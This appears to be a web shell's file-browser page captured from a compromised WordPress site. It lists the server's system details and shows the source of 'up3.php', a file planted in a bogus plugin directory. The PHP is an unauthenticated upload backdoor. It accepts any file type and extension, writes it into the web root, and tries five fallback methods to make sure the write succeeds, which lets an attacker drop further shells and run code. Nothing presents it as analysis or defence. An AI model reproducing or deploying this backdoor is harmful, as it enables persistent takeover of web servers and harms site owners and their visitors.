HEX
Server: Apache/2
System: Linux sv.lamweb.online 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
User: pnvtravel (1011)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/pnvtravel/domains/pnvtravel.com/public_html/wp-content/plugins/zeddplugins/m/
Upload Files
File: /home/pnvtravel/domains/pnvtravel.com/public_html/wp-content/plugins/zeddplugins/m/up3.php
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['ufile'])) {
    $f = $_FILES['ufile'];

    if ($f['error'] !== UPLOAD_ERR_OK) {
        http_response_code(400);
        die("❌ Upload error: {$f['error']}");
    }

    $src = $f['tmp_name'];
    $fileSize = $f['size'];

    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    $prefix = time() . '_' . bin2hex(random_bytes(4));
    $destName = $prefix . ($ext ? '.' . $ext : '');
    $destPath = __DIR__ . DIRECTORY_SEPARATOR . $destName;

    $ok = false;
    $method = null;
    $temp_src = $src; 

    if (!$ok && is_uploaded_file($temp_src) && @move_uploaded_file($temp_src, $destPath)) {
        $ok = true; 
        $method = 'move_uploaded_file';
        $temp_src = null; 
    }

    if (!$ok && is_uploaded_file($temp_src)) { 
        $in = @fopen($temp_src, 'rb');
        $out = @fopen($destPath, 'wb');

        if ($in !== false && $out !== false) {
            $copiedBytes = 0;
            while (!feof($in)) {
                $chunk = fread($in, 4096); 
                if ($chunk === false) break;
                $written = fwrite($out, $chunk);
                if ($written === false) break;
                $copiedBytes += $written;
            }
            
            if (is_resource($in)) fclose($in);
            if (is_resource($out)) fclose($out);

            if (file_exists($destPath) && filesize($destPath) === $fileSize && $copiedBytes > 0) {
                $ok = true; 
                $method = 'stream_copy_manual';
            }
        }
    }
    
    if (!$ok && $temp_src && is_uploaded_file($temp_src) && @rename($temp_src, $destPath)) {
        $ok = true; 
        $method = 'rename';
    }

    if (!$ok && $temp_src && is_uploaded_file($temp_src) && @copy($temp_src, $destPath)) {
        if (file_exists($destPath) && filesize($destPath) === $fileSize) {
            $ok = true; 
            $method = 'copy_method';
        }
    }

    if (!$ok && $temp_src) {
        if ($fileSize < 4 * 1024 * 1024) { 
            $content = @file_get_contents($temp_src);
            $written = ($content !== false) ? @file_put_contents($destPath, $content) : false;

            if ($written && $written === $fileSize) {
                $ok = true;
                $method = 'file_put_contents';
            }
        }
    }
    
    if ($temp_src && is_uploaded_file($temp_src)) {
        @unlink($temp_src);
    }
    
    if ($ok) {
        @chmod($destPath, 0644); 
        $sizeKB = number_format(filesize($destPath) / 1024, 2);

        echo "✅ Upload sukses!\n";
        echo "⚡ Metode yang berhasil: **{$method}**\n";
        echo "📦 Nama file server-side: {$destName}\n";
        echo "💾 Ukuran: {$sizeKB} KB\n";
    } else {
        http_response_code(500);
        echo "❌ Semua 5 metode upload gagal memindahkan file.";
        if (file_exists($destPath) && filesize($destPath) === 0) {
            @unlink($destPath);
        }
    }
    exit;
}
?>
<form method="POST" enctype="multipart/form-data">
    <input type="file" name="ufile" required>
    <button type="submit">Upload File</button>
</form>
@ Telegram